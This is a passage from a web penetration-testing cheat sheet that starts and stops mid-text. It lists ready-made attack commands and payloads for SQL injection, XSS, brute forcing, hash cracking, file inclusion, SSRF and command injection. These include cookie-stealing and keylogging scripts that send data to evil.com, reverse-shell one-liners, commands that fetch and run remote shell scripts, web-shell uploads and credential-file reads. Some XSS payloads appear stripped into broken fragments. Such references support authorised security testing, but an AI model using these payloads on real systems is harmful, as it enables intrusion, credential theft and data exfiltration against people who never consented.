cli\n```\n\n### Wayback Machine URL Extraction\n\n```bash\n# Get all historical URLs\nwaybackurls 
target.com | tee wayback_urls.txt\n\n# Gau (Get All URLs)\ngau target.com | tee gau_urls.txt\n\n# Filter interesting endpoints\ncat wayback_urls.txt | grep -E \"\\.php|\\?|\\.asp|\\.aspx|\\.jsp|api|admin|login\"\n\n# Check for parameters\ncat wayback_urls.txt | grep \"=\" | sort -u\n```\n\n---\n\n## Vulnerability Assessment\n\n### Automated Scanners\n\n#### Nuclei\n```bash\n# Basic scan\nnuclei -u https://target.com\n\n# With templates\nnuclei -u https://target.com -t cves/\nnuclei -u https://target.com -t exposures/\nnuclei -u https://target.com -t misconfiguration/\n\n# Severity-based\nnuclei -u https://target.com -severity critical,high\n\n# Multiple targets\nnuclei -l targets.txt\n\n# Output formats\nnuclei -u https://target.com -o results.txt -json\n\n# Rate limiting\nnuclei -u https://target.com -rl 150 -bs 25 -c 25\n```\n\n#### Nessus (Commercial)\n```bash\n# CLI usage\nnessuscli scan new --name \"Web Scan\" --targets target.com --policy \"Web App Tests\"\nnessuscli scan launch --scan-id 123\nnessuscli report download --scan-id 123 --format html\n```\n\n#### OpenVAS\n```bash\n# Start services\nsudo gvm-start\n\n# CLI scan creation\ngvm-cli --gmp-username admin --gmp-password pass socket --socketpath /var/run/gvmd.sock --xml \"...\"\n```\n\n### Manual Testing Techniques\n\n#### Security Headers Check\n```bash\n# Check security headers\ncurl -sI https://target.com | grep -iE \"strict-transport-security|content-security-policy|x-frame-options|x-content-type-options|referrer-policy|permissions-policy\"\n\n# Using online tools\n# securityheaders.com\n# observatory.mozilla.org\n```\n\n#### Information Disclosure\n```bash\n# Check for debug pages\ncurl -s https://target.com/phpinfo.php\ncurl -s https://target.com/info\ncurl -s https://target.com/server-status\n\n# Check for version disclosure\ncurl -sI https://target.com | grep -i \"server\\|x-powered-by\"\ncurl -s https://target.com | grep -i \"generator\\|version\"\n\n# Check for error messages\ncurl -s 
\"https://target.com/page?id='\" | grep -i \"sql\\|error\\|warning\"\n```\n\n#### CORS Misconfiguration\n```bash\n# Test with origin header\ncurl -sI https://target.com -H \"Origin: https://evil.com\" | grep -i \"access-control-allow-origin\"\n\n# Test with null origin\ncurl -sI https://target.com -H \"Origin: null\" | grep -i \"access-control-allow-origin\"\n```\n\n#### HTTP Methods Testing\n```bash\n# Check allowed methods\ncurl -sI https://target.com -X OPTIONS | grep -i \"allow\"\n\n# Test dangerous methods\ncurl -X PUT -d \"test\" https://target.com/test.txt\ncurl -X DELETE https://target.com/test.txt\ncurl -X TRACE https://target.com\n```\n\n---\n\n## SQL Injection (SQLi)\n\n### Detection Techniques\n\n#### Manual Testing\n```bash\n# Basic payloads\n' OR '1'='1\n' OR 1=1--\n\" OR \"1\"=\"1\n1' AND '1'='1\n1' AND '1'='2\n' OR '1'='1' --\n\n# Comments\n'--\n'#\n'/*\n'\n-- \n#\n\n# Union-based detection\n' UNION SELECT NULL--\n' UNION SELECT NULL,NULL--\n' UNION SELECT NULL,NULL,NULL--\n\n# Boolean-based\n' AND 1=1--\n' AND 1=2--\n\n# Time-based\n' AND SLEEP(5)--\n' WAITFOR DELAY '00:00:05'--\n' AND 1=1 AND SLEEP(5)--\n```\n\n#### Automated Detection with SQLmap\n```bash\n# Basic detection\nsqlmap -u \"https://target.com/page?id=1\"\n\n# POST request\nsqlmap -u \"https://target.com/login\" --data=\"username=admin&password=test\"\n\n# From Burp request file\nsqlmap -r request.txt\n\n# With cookie\nsqlmap -u \"https://target.com/page?id=1\" --cookie=\"session=abc123\"\n\n# Level and risk\nsqlmap -u \"https://target.com/page?id=1\" --level=5 --risk=3\n\n# Random user agent\nsqlmap -u \"https://target.com/page?id=1\" --random-agent\n\n# Batch mode (no prompts)\nsqlmap -u \"https://target.com/page?id=1\" --batch\n\n# Force SSL\nsqlmap -u \"https://target.com/page?id=1\" --force-ssl\n```\n\n### Data Extraction\n\n#### Database Enumeration\n```bash\n# Get databases\nsqlmap -u \"https://target.com/page?id=1\" --dbs\n\n# Get current database\nsqlmap -u 
\"https://target.com/page?id=1\" --current-db\n\n# Get current user\nsqlmap -u \"https://target.com/page?id=1\" --current-user\n\n# Get database users\nsqlmap -u \"https://target.com/page?id=1\" --users\n\n# Get database privileges\nsqlmap -u \"https://target.com/page?id=1\" --privileges\n```\n\n#### Table Enumeration\n```bash\n# Get tables from database\nsqlmap -u \"https://target.com/page?id=1\" -D database_name --tables\n\n# Get columns from table\nsqlmap -u \"https://target.com/page?id=1\" -D database_name -T users --columns\n\n# Dump table data\nsqlmap -u \"https://target.com/page?id=1\" -D database_name -T users --dump\n\n# Dump specific columns\nsqlmap -u \"https://target.com/page?id=1\" -D database_name -T users -C username,password --dump\n\n# Conditional dump\nsqlmap -u \"https://target.com/page?id=1\" -D database_name -T users --dump --where=\"id=1\"\n```\n\n### Advanced SQLmap Techniques\n\n#### Bypass Techniques\n```bash\n# Tamper scripts\nsqlmap -u \"https://target.com/page?id=1\" --tamper=space2comment\nsqlmap -u \"https://target.com/page?id=1\" --tamper=between,randomcase\nsqlmap -u \"https://target.com/page?id=1\" --tamper=apostrophemask,apostrophenullencode\n\n# List all tamper scripts\nsqlmap --list-tampers\n\n# WAF bypass\nsqlmap -u \"https://target.com/page?id=1\" --tamper=space2comment --random-agent --flush-session\n\n# No-cast\nsqlmap -u \"https://target.com/page?id=1\" --no-cast\n\n# Hex conversion\nsqlmap -u \"https://target.com/page?id=1\" --hex\n```\n\n#### File System Access\n```bash\n# Read file\nsqlmap -u \"https://target.com/page?id=1\" --file-read=/etc/passwd\n\n# Write file\nsqlmap -u \"https://target.com/page?id=1\" --file-write=shell.php --file-dest=/var/www/html/shell.php\n\n# Check privileges\nsqlmap -u \"https://target.com/page?id=1\" --is-dba\n```\n\n#### OS Command Execution\n```bash\n# Get OS shell\nsqlmap -u \"https://target.com/page?id=1\" --os-shell\n\n# Execute command\nsqlmap -u \"https://target.com/page?id=1\" 
--os-cmd=\"id\"\n\n# SQL shell\nsqlmap -u \"https://target.com/page?id=1\" --sql-shell\n```\n\n### Common SQL Injection Payloads\n\n#### Authentication Bypass\n```sql\nadmin' --\nadmin' #\nadmin'/*\n' or 1=1--\n' or 1=1#\n' or 1=1/*\n') or '1'='1--\n') or ('1'='1--\n' UNION SELECT 1, 'admin', 'password'--\n```\n\n#### Union-Based Payloads\n```sql\n' UNION SELECT null, null, null--\n' UNION SELECT 1,2,3--\n' UNION SELECT 1,@@version,3--\n' UNION SELECT 1,table_name,3 FROM information_schema.tables--\n' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--\n```\n\n#### Error-Based Payloads\n```sql\n' AND extractvalue(1, concat(0x7e, database()))--\n' AND updatexml(1, concat(0x7e, database()), 1)--\n' AND (SELECT * FROM(SELECT COUNT(*),CONCAT(database(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--\n```\n\n#### Boolean-Based Payloads\n```sql\n' AND 1=1--\n' AND 1=2--\n' AND SUBSTRING(database(),1,1)='a'--\n' AND ASCII(SUBSTRING(database(),1,1)) > 100--\n```\n\n#### Time-Based Payloads\n```sql\n' AND SLEEP(5)--\n' AND BENCHMARK(10000000,MD5('a'))--\n' WAITFOR DELAY '00:00:05'--\n' AND 1=(SELECT COUNT(*) FROM sysobjects WHERE xtype='U' AND WAITFOR DELAY '00:00:05')--\n```\n\n### Second-Order SQL Injection\n```bash\n# Register with malicious payload\nsqlmap -u \"https://target.com/register\" --data=\"username=admin'--&password=test\"\n\n# Trigger on another page\nsqlmap -u \"https://target.com/profile\" --cookie=\"session=abc123\" --second-url=\"https://target.com/profile\"\n```\n\n### NoSQL Injection\n```javascript\n// MongoDB\n' || '1'=='1\n' || 1==1//\n' && this.password.match(/.*/)//\n' && this.username.match(/admin/)//\n\n// Authentication bypass\n{ \"username\": { \"$ne\": null }, \"password\": { \"$ne\": null } }\n{ \"username\": { \"$regex\": \"admin\" }, \"password\": { \"$regex\": \"^.*\" } }\n\n// Tools\n# NoSQLMap\nnosqlmap.py --target http://target.com --attack\n```\n\n---\n\n## 
Cross-Site Scripting (XSS)\n\n### XSS Types\n\n#### Reflected XSS\n```html\n\nalert('XSS')\n\n\nhttps://target.com/search?q=alert(1)\n\n\n\n```\n\n#### Stored XSS\n```html\n\nalert(document.cookie)\n\n\n\n\n\n\n```\n\n#### DOM-Based XSS\n```javascript\n// URL fragment\nhttps://target.com/#alert(1)\n\n// document.write\ndocument.write(location.hash.substring(1))\n\n// innerHTML\nelement.innerHTML = location.hash.substring(1)\n\n// eval\neval(location.hash.substring(1))\n```\n\n### XSS Payloads\n\n#### Basic Alert Payloads\n```html\nalert('XSS')\nalert(1)\nalert(document.cookie)\nalert(document.domain)\nalert(document.URL)\n```\n\n#### Event Handler Payloads\n```html\n\n\n\n\nHover me\n\n\n\n```\n\n#### Attribute Breakout\n```html\n\">alert(1)\n'>alert(1)\njavascript:alert(1)\n\">\n' onmouseover=alert(1) '\n```\n\n#### Encoded Payloads\n```html\n%3Cscript%3Ealert(1)%3C/script%3E\n&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;\nipt>alert(1)ipt>\nalert(1)\n```\n\n#### Polyglot Payloads\n```html\njavascript:/*-->\n\" onclick=alert(1)//Click\n```\n\n### Advanced XSS Attacks\n\n#### Cookie Stealing\n```html\n\nfetch('https://evil.com/steal?cookie='+document.cookie)\nnew Image().src='https://evil.com/steal?c='+document.cookie\ndocument.location='https://evil.com/steal?c='+document.cookie\n\n\nfetch('https://evil.com/steal', {method:'POST', body:document.cookie, mode:'no-cors'})\n\n\nfetch('https://evil.com/steal?data='+btoa(JSON.stringify(localStorage)))\n```\n\n#### Keylogging\n```javascript\n\ndocument.onkeypress = function(e) {\n    fetch('https://evil.com/keylog?key='+e.key);\n}\n\n```\n\n#### Session Hijacking\n```html\n\nfetch('https://evil.com/steal?token='+localStorage.getItem('token'))\n\n\n\nvar token = localStorage.getItem('token');\ndocument.write('');\n\n```\n\n#### Phishing\n```html\n\n\ndocument.body.innerHTML = '\n\nSession Expired\n';\n\n```\n\n#### Port Scanning\n```javascript\n\n// let (not var) so each callback sees its own i instead of the final loop value\nfor (let i=1;i<=1024;i++) {\n    var img = new 
Image();\n    img.onload = function() { console.log('Port open: ' + i); };\n    img.onerror = function() { console.log('Port closed: ' + i); };\n    img.src = 'http://localhost:' + i;\n}\n\n```\n\n### XSS Testing Tools\n\n#### Dalfox\n```bash\n# Basic scan\ndalfox url https://target.com/page?q=test\n\n# File input\ndalfox file urls.txt\n\n# With cookie\ndalfox url https://target.com/page?q=test --cookie \"session=abc123\"\n\n# Blind XSS\ndalfox url https://target.com/page?q=test --blind \"https://xsshunter.com\"\n\n# Output formats\ndalfox url https://target.com/page?q=test --output results.txt --format json\n\n# Custom payloads\ndalfox url https://target.com/page?q=test --custom-payload-file payloads.txt\n```\n\n#### XSStrike\n```bash\n# Basic scan\npython3 xsstrike.py -u \"https://target.com/page?q=test\"\n\n# POST request\npython3 xsstrike.py -u \"https://target.com/search\" --data \"q=test\"\n\n# Crawl and test\npython3 xsstrike.py -u \"https://target.com\" --crawl\n\n# Skip DOM checking\npython3 xsstrike.py -u \"https://target.com/page?q=test\" --skip-dom\n```\n\n#### XSSer\n```bash\n# Basic scan\nxsser -u \"https://target.com/page?q=test\"\n\n# POST request\nxsser -u \"https://target.com/login\" --post=\"user=test&pass=test\"\n\n# Auto\nxsser --auto \"https://target.com/page?q=test\"\n\n# Crawler\nxsser --crawler \"https://target.com\"\n```\n\n### XSS Prevention Bypass\n\n#### WAF Bypass Techniques\n```html\n\nalert(1)\n\n\npt>alert(1)ript>\n\n\n\nalert(1)\n\n\n\n<\tscript\t>alert(1)</\tscript\t>\n\n\n%3cscript%3ealert(1)%3c/script%3e\n\n\n%253cscript%253ealert(1)%253c/script%253e\n\n\n+ADw-script+AD4-alert(1)+ADw-/script+AD4-\n\n\n\n\n\n<\u017fcript>alert(1)</\u017fcript>\n```\n\n#### CSP Bypass\n```html\n\nalert(1)\n\n\neval('alert(1)')\n\n\n\n\n\n\n\n\n\n\n```\n\n---\n\n## Authentication Attacks\n\n### Brute Force Tools\n\n#### Hydra\n```bash\n# HTTP POST form\nhydra -l admin -P rockyou.txt target.com http-post-form 
\"/login:username=^USER^&password=^PASS^:Invalid\"\n\n# HTTP GET with basic auth\nhydra -L users.txt -P pass.txt target.com http-get /protected\n\n# HTTPS POST\nhydra -l admin -P pass.txt -s 443 target.com https-post-form \"/login:user=^USER^&pass=^PASS^:F=incorrect\"\n\n# With cookies\nhydra -l admin -P pass.txt target.com http-post-form \"/login:username=^USER^&password=^PASS^&cookie=value:H=session=abc123:F=Invalid\"\n\n# Multiple threads\nhydra -L users.txt -P pass.txt -t 16 target.com http-post-form \"/login:username=^USER^&password=^PASS^:Invalid\"\n\n# Output\nhydra -L users.txt -P pass.txt target.com http-post-form \"/login:user=^USER^&pass=^PASS^:Invalid\" -o results.txt\n\n# SSH\nhydra -L users.txt -P pass.txt ssh://target.com\n\n# FTP\nhydra -l admin -P pass.txt ftp://target.com\n\n# SMTP\nhydra -l admin@target.com -P pass.txt smtp://target.com\n\n# MySQL\nhydra -l root -P pass.txt mysql://target.com\n\n# RDP\nhydra -L users.txt -P pass.txt rdp://target.com\n\n# SMB\nhydra -L users.txt -P pass.txt smb://target.com\n```\n\n#### Medusa\n```bash\n# HTTP\nmedusa -h target.com -U users.txt -P pass.txt -M http -m DIR:/login -T 10\n\n# SSH\nmedusa -h target.com -U users.txt -P pass.txt -M ssh -T 4\n\n# FTP\nmedusa -h target.com -U users.txt -P pass.txt -M ftp\n\n# MySQL\nmedusa -h target.com -U users.txt -P pass.txt -M mysql\n```\n\n#### Patator\n```bash\n# HTTP POST\npatator http_fuzz url=https://target.com/login method=POST body='user=FILE0&pass=FILE1' 0=users.txt 1=pass.txt -x ignore:fgrep='Invalid'\n\n# FTP\npatator ftp_login host=target.com user=FILE0 password=FILE1 0=users.txt 1=pass.txt -x ignore:mesg='Login incorrect'\n\n# SSH\npatator ssh_login host=target.com user=FILE0 password=FILE1 0=users.txt 1=pass.txt -x ignore:mesg='Authentication failed'\n```\n\n### Dictionary Attacks with Hashcat\n\n#### Hash Identification\n```bash\n# Identify hash type\nhashid hash.txt\nhash-identifier hash\n```\n\n#### Common Hash 
Modes\n```bash\n# MD5\nhashcat -m 0 hash.txt rockyou.txt\n\n# SHA1\nhashcat -m 100 hash.txt rockyou.txt\n\n# SHA256\nhashcat -m 1400 hash.txt rockyou.txt\n\n# SHA512 (-m 1800 is sha512crypt $6$ as used in /etc/shadow; raw SHA512 is -m 1700)\nhashcat -m 1800 hash.txt rockyou.txt\n\n# NTLM\nhashcat -m 1000 hash.txt rockyou.txt\n\n# bcrypt\nhashcat -m 3200 hash.txt rockyou.txt\n\n# WordPress\nhashcat -m 400 hash.txt rockyou.txt\n\n# Joomla\nhashcat -m 400 hash.txt rockyou.txt\n\n# Drupal\nhashcat -m 7900 hash.txt rockyou.txt\n```\n\n#### Attack Modes\n```bash\n# Straight (wordlist)\nhashcat -a 0 -m 0 hash.txt rockyou.txt\n\n# Combination\nhashcat -a 1 -m 0 hash.txt wordlist1.txt wordlist2.txt\n\n# Mask attack (brute force)\nhashcat -a 3 -m 0 hash.txt ?l?l?l?l?l?l?l?l\n\n# Hybrid wordlist + mask\nhashcat -a 6 -m 0 hash.txt rockyou.txt ?d?d?d\n\n# Hybrid mask + wordlist\nhashcat -a 7 -m 0 hash.txt ?d?d?d rockyou.txt\n\n# Rule-based\nhashcat -a 0 -m 0 hash.txt rockyou.txt -r best64.rule\n```\n\n#### Rules and Masks\n```bash\n# Common masks\n?l = lowercase (a-z)\n?u = uppercase (A-Z)\n?d = digits (0-9)\n?s = special (!@#$%^&*)\n?a = all (l,u,d,s)\n?b = binary (0x00-0xff)\n\n# Examples\n?l?l?l?l?l = 5 lowercase\n?u?l?l?l?d?d = Capital + 3 lowercase + 2 digits\n?d?d?d?d?d?d = 6 digits\n?a?a?a?a?a?a = 6 any characters\n\n# Built-in rules\n/usr/share/hashcat/rules/best64.rule\n/usr/share/hashcat/rules/d3ad0ne.rule\n/usr/share/hashcat/rules/OneRuleToRuleThemAll.rule\n```\n\n### John the Ripper\n\n```bash\n# Basic crack\njohn --wordlist=rockyou.txt hash.txt\n\n# With format\njohn --format=raw-md5 --wordlist=rockyou.txt hash.txt\n\n# Show results\njohn --show hash.txt\n\n# Single crack mode\njohn --single hash.txt\n\n# Incremental (brute force)\njohn --incremental hash.txt\n\n# Rules\njohn --wordlist=rockyou.txt --rules hash.txt\n\n# Shadow file\nunshadow passwd shadow > combined.txt\njohn --wordlist=rockyou.txt combined.txt\n\n# SSH private key\nssh2john id_rsa > id_rsa.hash\njohn --wordlist=rockyou.txt id_rsa.hash\n```\n\n### Authentication 
Bypass Techniques\n\n#### SQL Injection Bypass\n```sql\nadmin' --\nadmin' #\nadmin'/*\n' or 1=1--\n' or 1=1#\n' or 1=1/*\n') or '1'='1--\n') or ('1'='1--\n' UNION SELECT 1,'admin','password'--\n' UNION SELECT NULL,NULL,NULL--\n```\n\n#### Parameter Tampering\n```http\n# Change user ID\nGET /profile?user_id=1\nGET /profile?user_id=2\n\n# Change role parameter\nPOST /admin\nrole=user \u2192 role=admin\n\n# Boolean parameters\nisAdmin=false \u2192 isAdmin=true\nadmin=0 \u2192 admin=1\n\n# Array parameters\nuser_ids[]=1 \u2192 user_ids[]=2\n```\n\n#### JWT Attacks\n```bash\n# Decode the JWT payload: take the second dot-separated segment, convert base64url to base64 and restore padding before base64 -d\necho \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c\" | cut -d. -f2 | tr '_-' '/+' | awk '{while(length($0)%4)$0=$0\"=\";print}' | base64 -d\n\n# JWT tool\njwt_tool token.jwt -T\n\n# Change algorithm to none\njwt_tool token.jwt -X a\n\n# Brute force secret\njwt_tool token.jwt -C -d rockyou.txt\n\n# Kid injection\njwt_tool token.jwt -I -hc kid -hv \"../../../dev/null\"\n```\n\n#### OAuth Misconfiguration\n```http\n# Redirect URI manipulation\nhttps://target.com/oauth/callback?code=xxx&state=yyy\nhttps://evil.com/oauth/callback?code=xxx&state=yyy\n\n# CSRF on OAuth\n\n\n# Scope escalation\nscope=read \u2192 scope=read+write\n```\n\n#### Session Fixation\n```http\n# Set session before login\nGET /login?PHPSESSID=attacker_session\n\n# After login, same session ID is authenticated\nGET /profile HTTP/1.1\nCookie: PHPSESSID=attacker_session\n```\n\n#### 2FA Bypass\n```http\n# Response manipulation\nHTTP/1.1 302 Found\nLocation: /2fa\n\n# Change to:\nHTTP/1.1 302 Found\nLocation: /dashboard\n\n# Parameter tampering\n2fa=123456 \u2192 2fa=000000\n\n# Null parameter\n2fa=123456 \u2192 2fa=\n\n# OTP reuse\n```\n\n---\n\n## File Inclusion Vulnerabilities\n\n### Local File Inclusion (LFI)\n\n#### Basic LFI\n```http\n# Directory traversal\nhttps://target.com/page?file=../../etc/passwd\nhttps://target.com/page?file=..\\..\\..\\windows\\win.ini\n\n# URL 
encoded\nhttps://target.com/page?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd\nhttps://target.com/page?file=..%252f..%252fetc%252fpasswd\n\n# Double encoding\nhttps://target.com/page?file=%25%32%65%25%32%65%25%32%66etc%25%32%66passwd\n```\n\n#### LFI with Null Byte (PHP < 5.3)\n```http\nhttps://target.com/page?file=../../etc/passwd%00\nhttps://target.com/page?file=../../etc/passwd%00.php\n```\n\n#### LFI with Path Truncation\n```http\nhttps://target.com/page?file=../../../../etc/passwd......................\nhttps://target.com/page?file=../../../../etc/passwd////////////////////\n```\n\n#### LFI Wrappers\n```php\n# PHP filter wrapper (read source)\nhttps://target.com/page?file=php://filter/convert.base64-encode/resource=index.php\nhttps://target.com/page?file=php://filter/convert.base64-encode/resource=../../../../etc/passwd\n\n# PHP input wrapper (execute code)\nPOST /page?file=php://input HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\n\n\n# PHP expect wrapper (if enabled)\nhttps://target.com/page?file=expect://id\n\n# Data wrapper\nhttps://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOz8+\n\n# File wrapper\nhttps://target.com/page?file=file:///etc/passwd\n\n# Zip wrapper\nhttps://target.com/page?file=zip://shell.jpg#shell.php\n```\n\n### Remote File Inclusion (RFI)\n\n```http\n# Basic RFI\nhttps://target.com/page?file=http://evil.com/shell.txt\nhttps://target.com/page?file=https://evil.com/shell.php\nhttps://target.com/page?file=ftp://evil.com/shell.txt\n\n# With URL encoding\nhttps://target.com/page?file=http%3A%2F%2Fevil.com%2Fshell.txt\n\n# PHP wrapper\nhttps://target.com/page?file=php://filter/convert.base64-encode/resource=http://evil.com/shell.php\n```\n\n### Log Poisoning\n\n```bash\n# Apache access log poisoning\n# Inject PHP code in User-Agent\ncurl -A \"\" https://target.com\n\n# Then include log file\nhttps://target.com/page?file=/var/log/apache2/access.log\n\n# SSH log poisoning\nssh 
''@target.com\nhttps://target.com/page?file=/var/log/auth.log\n\n# Mail log poisoning\ntelnet target.com 25\nMAIL FROM: \nRCPT TO: victim@localhost\nDATA\nSubject: test\ntest\n.\n\nhttps://target.com/page?file=/var/log/mail.log\n```\n\n### LFI to RCE\n\n```bash\n# Proc self/environ poisoning\ncurl -H \"User-Agent: \" https://target.com\nhttps://target.com/page?file=/proc/self/environ\n\n# Session file poisoning\n# First, set session variable\nhttps://target.com/page?file=\n# Then include session file\nhttps://target.com/page?file=/var/lib/php/sessions/sess_\n\n# Temp file upload (race condition)\n# Upload file, then include before cleanup\nhttps://target.com/page?file=/tmp/php\n```\n\n### LFI Discovery Wordlist\n```bash\n# Common LFI files\n/etc/passwd\n/etc/shadow\n/etc/hosts\n/etc/apache2/apache2.conf\n/etc/nginx/nginx.conf\n/var/log/apache2/access.log\n/var/log/nginx/access.log\n/var/log/auth.log\n/var/log/mail.log\n/proc/self/environ\n/proc/self/cmdline\n/proc/self/fd/0\n/proc/self/fd/1\n/proc/self/fd/2\nC:\\boot.ini\nC:\\windows\\win.ini\nC:\\windows\\system32\\drivers\\etc\\hosts\n```\n\n---\n\n## Server-Side Request Forgery (SSRF)\n\n### Basic SSRF\n\n```http\n# Localhost access\nhttps://target.com/fetch?url=http://127.0.0.1/\nhttps://target.com/fetch?url=http://localhost/\nhttps://target.com/fetch?url=http://[::1]/\nhttps://target.com/fetch?url=http://0.0.0.0/\n\n# Decimal IP\nhttps://target.com/fetch?url=http://2130706433/ (127.0.0.1)\nhttps://target.com/fetch?url=http://3232235521/ (192.168.0.1)\n\n# Octal IP\nhttps://target.com/fetch?url=http://0177.0.0.1/\nhttps://target.com/fetch?url=http://0x7f.0x0.0x0.0x1/\n\n# Domain tricks\nhttps://target.com/fetch?url=http://localhost.127.0.0.1.nip.io/\nhttps://target.com/fetch?url=http://127.0.0.1.xip.io/\n```\n\n### Cloud Metadata SSRF\n\n```bash\n# AWS 
metadata\nhttps://target.com/fetch?url=http://169.254.169.254/latest/meta-data/\nhttps://target.com/fetch?url=http://169.254.169.254/latest/user-data/\nhttps://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/\n\n# GCP metadata\nhttps://target.com/fetch?url=http://metadata.google.internal/computeMetadata/v1/\nhttps://target.com/fetch?url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token\n-H \"Metadata-Flavor: Google\"\n\n# Azure metadata\nhttps://target.com/fetch?url=http://169.254.169.254/metadata/instance?api-version=2017-08-01\n-H \"Metadata: true\"\n\n# Digital Ocean metadata\nhttps://target.com/fetch?url=http://169.254.169.254/metadata/v1.json\n```\n\n### Internal Network Scanning\n\n```bash\n# Port scan with SSRF\nfor port in {1..1024}; do\n    curl -s \"https://target.com/fetch?url=http://192.168.1.1:$port\" \\\n        | grep -q \"Connection refused\" || echo \"Port $port open\"\ndone\n\n# Discover internal IP ranges\nfor ip in {1..254}; do\n    curl -s \"https://target.com/fetch?url=http://10.0.0.$ip:80\" \\\n        -m 1 | grep -q \"Connection refused\" || echo \"10.0.0.$ip alive\"\ndone\n```\n\n### SSRF Bypass Techniques\n\n```bash\n# URL encoding\nhttps://target.com/fetch?url=http://%31%32%37%2E%30%2E%30%2E%31/\n\n# Double URL encoding\nhttps://target.com/fetch?url=http://%2531%2532%2537%252E%2530%252E%2530%252E%2531/\n\n# Redirect bypass\n# First, set up redirector\nhttps://evil.com/redirect?url=http://127.0.0.1:80\n# Then SSRF to redirector\nhttps://target.com/fetch?url=http://evil.com/redirect\n\n# DNS rebinding\n# Use dnsrebinder.net\nhttps://target.com/fetch?url=http://127.0.0.1.dnsrebinder.net\n\n# IPv6 bypass\nhttps://target.com/fetch?url=http://[::1]:80/\nhttps://target.com/fetch?url=http://[::ffff:7f00:0001]/\n\n# Alternative localhost representations\n127.0.0.0\n127.127.127.127\n127.0.1.3\n2130706433\n0x7f000001\n0177.0.0.1\n```\n\n### SSRF to RCE\n\n```bash\n# 
Internal Redis\nhttps://target.com/fetch?url=gopher://127.0.0.1:6379/_*2%0d%0a$4%0d%0aINFO%0d%0a\n\n# Internal Memcached\nhttps://target.com/fetch?url=gopher://127.0.0.1:11211/_stats\n\n# Internal MySQL\nhttps://target.com/fetch?url=mysql://127.0.0.1:3306/\n\n# Internal Elasticsearch\nhttps://target.com/fetch?url=http://127.0.0.1:9200/_cat/indices\n\n# Internal MongoDB\nhttps://target.com/fetch?url=mongodb://127.0.0.1:27017/\n```\n\n### SSRF with Different Protocols\n\n```bash\n# File protocol\nhttps://target.com/fetch?url=file:///etc/passwd\n\n# Dict protocol\nhttps://target.com/fetch?url=dict://127.0.0.1:3306/info\n\n# Gopher protocol\nhttps://target.com/fetch?url=gopher://127.0.0.1:8080/_GET%20/HTTP/1.0%0a%0a\n\n# FTP protocol\nhttps://target.com/fetch?url=ftp://anonymous:anonymous@127.0.0.1:21/\n\n# SFTP protocol\nhttps://target.com/fetch?url=sftp://user:pass@127.0.0.1:22/\n\n# TFTP protocol\nhttps://target.com/fetch?url=tftp://127.0.0.1:69/test\n```\n\n---\n\n## Command Injection\n\n### Basic Command Injection\n\n```bash\n# Command separators\n; id\n| id\n|| id\n& id\n&& id\n`id`\n$(id)\n\n# URL encoded\n%3Bid\n%7Cid\n%26%26id\n\n# Newline encoded\n%0aid\n```\n\n### Blind Command Injection\n\n```bash\n# Time-based\n; sleep 5\n| sleep 5\n& ping -c 10 127.0.0.1\n&& sleep 5\n\n# Output-based (if output is not returned)\n; wget http://evil.com/`whoami`\n| curl http://evil.com/$(id)\n& nslookup `hostname`.evil.com\n```\n\n### Command Injection Payloads\n\n```bash\n# Linux\n; id\n| id\n|| id\n& id\n&& id\n`id`\n$(id)\n; cat /etc/passwd\n| nc -e /bin/sh evil.com 4444\n& bash -i >& /dev/tcp/evil.com/4444 0>&1\n`wget http://evil.com/shell.sh -O /tmp/shell.sh && bash /tmp/shell.sh`\n\n# Windows\n& whoami\n| dir\n& ping -n 5 127.0.0.1\n& powershell -c \"Invoke-WebRequest -Uri http://evil.com/shell.exe -OutFile C:\\shell.exe\"\n```\n\n### Command Injection Bypass\n\n```bash\n# Space 
bypass\n${IFS}id\n{cat,/etc/passwd}\ncat${IFS}/etc/passwd\ncat< /etc/passwd\ncat>/etc/passwd\n\n# Character blacklist bypass\nc\\a\\t /etc/passwd\ncat /etc/pa??wd\ncat /etc/pass*\ncat /e'tc'/pa'ss'wd\necho \"Y2F0IC9ldGMvcGFzc3dk\" | base64 -d | bash\n\n# Command substitution\na=id; $a\nb=cat; $b /etc/passwd\nc=\"whoami\"; eval $c\n\n# Wildcards\n/???/?at /???/pass?? (cat /etc/passwd)\n/???/n? -e /???/pass?? (nc -e /bin/sh)\n```\n\n### Environment Variable Injection\n\n```bash\n# PATH manipulation\nPATH=/tmp:$PATH evil_binary\n\n# LD_PRELOAD injection\nLD_PRELOAD=/tmp/malicious.so vulnerable_binary\n\n# IFS injection\nIFS=,;`cat<<\" https://api.target.com/users\n\n# API key\ncurl -H \"X-API-Key: 123456\" https://api.target.com/users\ncurl \"https://api.target.com/users?api_key=123456\"\n\n# Basic auth\ncurl -u username:password https://api.target.com/users\n\n# OAuth2\ncurl -H \"Authorization: Bearer \" https://api.target.com/users\n```\n\n#### Parameter Fuzzing\n```bash\n# IDOR testing\ncurl https://api.target.com/users/1\ncurl https://api.target.com/users/2\ncurl https://api.target.com/users/1000\n\n# Parameter pollution\ncurl \"https://api.target.com/search?q=test&q=admin\"\n\n# JSON injection\ncurl -X POST https://api.target.com/users \\\n     -H \"Content-Type: application/json\" \\\n     -d '{\"name\":\"test\",\"role\":\"admin\"}'\n\n# Mass assignment\ncurl -X PUT https://api.target.com/users/1 \\\n     -H \"Content-Type: application/json\" \\\n     -d '{\"name\":\"test\",\"isAdmin\":true,\"balance\":999999}'\n```\n\n### GraphQL Testing\n\n#### Introspection\n```graphql\n# Get all types\n{\n  __schema {\n    types {\n      name\n      fields {\n        name\n        type {\n          name\n          kind\n        }\n      }\n    }\n  }\n}\n\n# Get queries\n{\n  __schema {\n    queryType {\n      fields {\n        name\n        args {\n          name\n          type {\n            name\n            kind\n          }\n        }\n      }\n    }\n  
